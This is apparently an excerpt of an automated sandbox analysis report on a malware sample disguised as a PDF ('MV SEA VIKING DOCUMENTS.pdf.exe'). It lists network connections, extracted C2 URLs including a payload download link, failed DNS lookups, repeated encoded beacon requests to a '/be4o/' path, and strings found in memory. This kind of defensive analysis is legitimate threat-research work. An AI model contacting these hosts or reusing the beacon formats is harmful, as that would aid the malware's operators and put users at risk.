      Source: C:\Windows\explorer.exeNetwork Connect: 35.244.144.199 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 79.110.48.188 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.32.22.102 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.184.31.217 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.98 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.195.115.71 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.214.67.115 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.154.157 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.143.0.82 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.190.39.52 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 148.251.15.228 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 213.190.6.63 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.154.44.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 142.250.186.51 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.0.209.21 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 95.179.246.125 80Jump to behavior
      Uses dynamic DNS services
      Source: unknownDNS query: name: www.logotzo.com
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED
      Source: Malware configuration extractorURLs: www.istemnetwork.com/be4o/
      Tries to resolve many domain names, but no domain seems valid
      Source: unknownDNS traffic detected: query: www.kuanghong.club replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: www.icarus-groupe.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.piqqekqqbpjpajbzvvfqapwr.store replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.justbe-event.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.logotzo.com replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: www.personas1web.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.istemnetwork.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.percentrostered.net replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.marvinhull.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: www.owensigns.com replaycode: Name error (3)
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN0 HTTP/1.1Host: www.neonewway.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=2H0l+vSkOseleOGxaYuOAM6EcVRszlgpd1g39MbiOsu7jwlookSoZaEGSOy4tzpz9QV3&GXqXh=YZ_XN0 HTTP/1.1Host: www.7bkj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0 HTTP/1.1Host: www.waktuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&GXqXh=YZ_XN0 HTTP/1.1Host: www.quanqiu55555.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&GXqXh=YZ_XN0 HTTP/1.1Host: www.mariachinuevozacatecas24-7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=hkcde7P37oUuH8w5ioFv7OuFbHOx9d6tBZcdZbqEWA6Yt+e+JSjrlFDcUKkYXgm22imD&GXqXh=YZ_XN0 HTTP/1.1Host: www.antoniopasciuti.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=iu9SHmJYjlqHSITYxUYF5zd8ZPof8OreVpr1w+DDUlIuWCBWIgIZulFzL5qHxGUDcYYs&w6=ZbFDmL HTTP/1.1Host: www.4huav946.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmL HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=a9faHC2D7Dm/r4BU9fdxzX5Q1U3tWnFtWGXmSrkj2WSz2Xwsoc22xGDcB1dwRLNeK4a1&w6=ZbFDmL HTTP/1.1Host: www.itservon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=i0+Fnnt4E2duUPt43OZuwY3vuaej64lfKZi0K7F4B5AoqOaU2cNQP6t/zkb03XoiZyP6&w6=ZbFDmL HTTP/1.1Host: www.fairytalepageants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1Host: www.buresdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=7cKzimu7mUkgDRyMKljMoWyo6u+mjltrVmMX1NSvq0diecWuw4+QXmAspWvQrjbM5ify&w6=ZbFDmL HTTP/1.1Host: www.vendasdigitaisonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL HTTP/1.1Host: www.quanqiu55555.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=u3IzMx5ToVDuGGVnzGoQ7VGXCLeqa3ksCgRWKaNdgo4W3sFmKuQ6Eu5/95yvzyZg0zqi&7nx8=7nN0Wh-H7 HTTP/1.1Host: www.mariachinuevozacatecas24-7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H7 HTTP/1.1Host: www.nagradi7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu HTTP/1.1Host: www.waktuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1Host: www.buresdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?7nx8=7nN0Wh-H7&h48Hl=mz0ZGmPpQcHdBZrVbfezv7ox+MCQwaRA1qHDhj9nMfECw2TGe1c3Y7+z1tjTr42phwlz HTTP/1.1Host: www.eaglesaviationexperience.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7 HTTP/1.1Host: www.easypeasy.communityConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=hsW7O5325DRqN8YWXiUPXnAvYseB+yx3cLX7/2SBrZaiZrW5cMIJApIhTGhmYfsvRNMR&iVP=6lL026g HTTP/1.1Host: www.brainymortgage.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=MXCJfAiixaQW23gb43srtNqd5bs2JuRcGlYNxDXnDFPSUKLWpR3/CyWyuFSDkL8/v7KL&iVP=6lL026g HTTP/1.1Host: www.janhenningsen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&iVP=6lL026g HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1Host: www.buresdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=jq9b4c7BaMhD9kdTAddwzOt+LNN1qoIISHwx1xbT8oPDlt6nx7w14q7WGmdhUJs/cSrW&iVP=6lL026g HTTP/1.1Host: www.kaikkistore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1Host: www.dreamintelligent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1Host: www.josiemaran-supernatural.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0 HTTP/1.1Host: www.rsxrsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1Host: www.noireimpactcollective.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1Host: www.ooo-club.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
      Source: Joe Sandbox ViewIP Address: 64.32.22.102 64.32.22.102
      Source: unknownNetwork traffic detected: DNS query count 35
      Source: firefox.exe, 00000021.00000002.4634268032.00000000224C2000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://181ue.com/sq.html?entry=
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2432523941.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2424436619.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2724756121.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2432523941.0000000001AA0000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766276229.0000000001AA4000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2424436619.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2724756121.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4811980051.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000003.4810200786.0000000001A4E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819570976.0000000001A4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2691895888.00000000056EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2452435022.00000000056EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2504353276.00000000056EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590547531.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2562996826.00000000056EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2691895888.00000000056EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2452435022.00000000056EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2504353276.00000000056EE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590547531.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2562996826.00000000056EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: explorer.exe, 00000010.00000000.2567487509.0000000009B17000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2508765323.0000000009B17000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2696664365.0000000009B17000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2457275008.0000000009B17000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
      Source: explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590547531.000000000F7E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: http://s.symcd.com06
      Source: explorer.exe, 00000010.00000000.2497558929.0000000003500000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2462040165.000000000B060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.2571623791.000000000AB00000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, shmhprg0nvltzt.exe.16.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: explorer.exe, 00000010.00000000.2453881072.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505609208.0000000009890000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693591721.0000000009890000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304260697.0000000000626000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676661138.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: chkdsk.exe, 00000015.00000002.7218671686.000000000613B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ooo-club.com
      Source: chkdsk.exe, 00000015.00000002.7218671686.000000000613B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ooo-club.com/be4o/
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2303676581.00000000005F2000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676216902.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2303676581.00000000005F2000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676216902.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: explorer.exe, 00000010.00000000.2466445411.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2707742528.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2577458976.000000000D574000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2518578539.000000000D574000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe
      Source: explorer.exe, 00000010.00000000.2564854686.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454229324.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2505897529.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2693885884.00000000098CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmB
      Source: explorer.exe, 00000010.00000000.2590759572.000000000F80E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000010.00000000.2476687824.000000000F80D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530734369.000000000F80E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2590759572.000000000F80E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS4
      Source: explorer.exe, 00000010.00000000.2506307780.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454676516.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565245502.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2694288500.0000000009921000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000010.00000000.2506307780.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2454676516.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2565245502.0000000009921000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2694288500.0000000009921000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/E
      Source: explorer.exe, 00000010.00000000.2714991324.000000000DB9A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000010.00000000.2474470523.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588479333.000000000F630000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720941353.000000000F631000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2528229017.000000000F630000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF1435953622
